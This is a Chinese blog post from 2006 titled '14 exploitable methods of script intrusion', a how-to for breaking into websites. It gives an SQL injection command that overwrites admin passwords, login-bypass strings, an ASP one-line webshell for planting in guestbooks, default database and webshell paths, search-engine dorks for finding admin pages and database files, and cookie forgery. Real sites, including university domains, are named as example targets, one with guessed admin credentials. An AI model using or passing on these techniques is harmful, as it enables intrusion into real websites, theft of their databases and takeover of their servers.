首页
|
新闻
|
论坛
|
博客
|
专题
|
FTP
|
金融
|
微博
|
图库
|
MyHome
|
搜索
|
登陆
|
注册
|
帮助
|
设为首页
·
在线人数:
4167
§您的位置:
文逸首页
>
easyshow 's home
>
【教育学习】专栏
> 脚本入侵的14.
easyshow 的主页网址:http://wonyen.net/home.aspx?id=easyshow
给我留言
§ easyshow
的【
教育学习
】专栏
作者:
easyshow
发表时间: 2006/2/19 1:22:50 查看: 3362 评论: 2
标题:
脚本入侵的14种可利用方法
1.上传漏洞[不多讲]
pS: 如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”,80%就有漏洞了!
有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传.
2.注入漏洞[不多讲]
pS:对MD5密码.有时我们不是哪么容易跑出来.如果是[SQL数据库].那么我们可以用以下命令:
http://注入网址;update admin set password='新MD5密码' where password='旧MD5密码'-- [admin为表名.]
3.旁注,也就是跨站.
我们入侵某站时可能这个站坚固的无懈可击,我们可以找下和这个站同一服务器的站点,然后在利用这个站点用提权,嗅探等方法来入侵我们 要入侵的站点。,在这里有个难点,就是一些服务器的绝对路径经过加密,这就看我们的本事了
4.暴库:把二级目录中间的/换成%5c
EY
http://www.ahttc.edu.cn/otherweb/dz/bgs/BigClass.asp?BigClassName=
职责范围&BigClassType=1
如果你能看到:'E:\ahttc040901\otherweb\dz\database\iXuEr_Studio.asa'不是一个有效的路径。 确定路径名称拼写是否正确,以及是否 连接到文件存放的服务器。
这样的就是数据库了。下载时用FLASHGET换成.MDB格式的就行.
5.'or'='or'这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有:
'or''=' " or "a"="a ') or ('a'='a ") or ("a"="a or 1=1-- ' or 'a'='a
6.社会工程学。这个我们都知道吧。就是猜解。
EY
http://www.neu.edu.cn/waishi/admin
admin waishi
7.写入ASP格式数据库。就是一句话木马[<%execute request("value")%> ],常用在留言本.
EY
http://www.ahsdxy.ah.edu.cn/ebook/db/ebook.asp
[这个就是ASP格式的数据库],再写入一句话木马
8.源码利用:一些网站用的都是网上下载的源码.有的站长很菜.什么也不改.
EY
http://www.ahsdxy.ah.edu.cn/xiaoyoulu/index.asp
这个站用的是:杰出校友录,源码我下过了,
默认数据库/webshell路径:\database\liangu_data.mdb 后台管理:adm_login.asp 密码及用户名都是admin
9.默认数据库/webshell路径利用:这样的网站很多/利人别人的WEBSHELL.
/Databackup/dvbbs7.MDB
/bbs/Databackup/dvbbs7.MDB
/bbs/Data/dvbbs7.MDB
/data/dvbbs7.mdb
/bbs/diy.asp
/diy.asp
/bbs/cmd.asp
/bbs/cmd.exe
/bbs/s-u.exe
/bbs/servu.exe
工具:网站猎手 挖掘鸡
EY
http://www.cl1999.com/bbs/Databackup/dvbbs7.MDB
10.查看目录法:人一些网站可以断开目录,可以方问目录。
EY
http://www.ujs168.com/shop/admin/
http://escolourfvl.com/babyfox/admin/%23bb%23dedsed2s/
这样我们可以找到数据库,下载不用我教吧
11.工具溢出:.asp?NewsID= /2j.asp?id=18 .asp?id=[这种方法可以取得大量的WEBSHELL]
12.搜索引擎利用:
(1).inurl:flasher_list.asp 默认数据库atabase/flash.mdb 后台/manager/
(2).找网站的管理后台地址:
site:xxxx.comintext:管理
site:xxxx.comintitle:管理 <关键字很多,自已找>
site:xxxx.cominurl:login
(3).查找access的数据库,mssql、mysql的连接文件
allinurl:bbsdata
filetype:mdbinurlatabase
filetype:incconn
inurlatafiletype:mdb
我主不做了。。自已做做吧。。
13.COOKIE诈骗:把自己的ID修改成管理员的,MD5密码也修改成他的,用桂林老兵工具可以修改COOKIE。这个我就不多讲了
14.利用常见的漏洞:如动网BBS
EY
http://js1011.com/bbs/index.asp
可以先用vbbs权限提升工具,使自已成为前台管理员。
THEN,运用:动网固顶贴工具,找个固顶贴,再取得COOKIES,这个要你自已做。我们可以用WSockExpert取得Cookies/NC包
这个我就不做了,网上教程多的是,自已下个看看。
工具:dvbbs权限提升工具 动网固顶贴工具
15.还有一些老漏洞。如IIS3,4的查看源码,5的DELETE
CGI,PHP的一些老洞,我就不说了啊。。太老了。没有什么大用途。
分享到:
【
管理日志
】【
我要评论
】
§
评论: 脚本入侵的14种可利用方法
共
0
条评论; 每页显示 15 条评论;
1
/
1
↑到页首
您未登陆,发表评论时请填写:用户名
*
密码
*
注册新用户
评论: 脚本入侵的14种可利用方法
内容
(8000字以内)
(CTRL+ENTER提交)
关闭窗口
用户登陆
我要发表文章
搜 索
§easyshow 的网志导航
【
感想随笔
】
(2)
【
生活休闲
】
(0)
【
饮食健康
】
(0)
【
自然妙趣
】
(0)
【
潮流时尚
】
(0)
【
游览见闻
】
(0)
【
情感绿洲
】
(7)
【
娱乐搞笑
】
(3)
【
读图时代
】
(0)
【
影音视听
】
(2)
【
商业新知
】
(1)
【
理论研究
】
(0)
【
时事纵横
】
(0)
【
社会文化
】
(0)
【
文学欣赏
】
(0)
【
教育学习
】
(27)
§easyshow 的友情链接
emuch
丁香园
关于文逸
|
小文论坛
|
文逸博客
|
文逸金融
|
精华文章
|
网站地图
| 联系我们 |
隐私保护
Copyright©
WWW.WONYEN.NET
2003 - 2021
闽ICP备09016518号-16
闽公网安备 35020502000004号
本站最高 10508 人同时在线,发生时间 2005-5-17 5:09:15
文逸科技
制作维护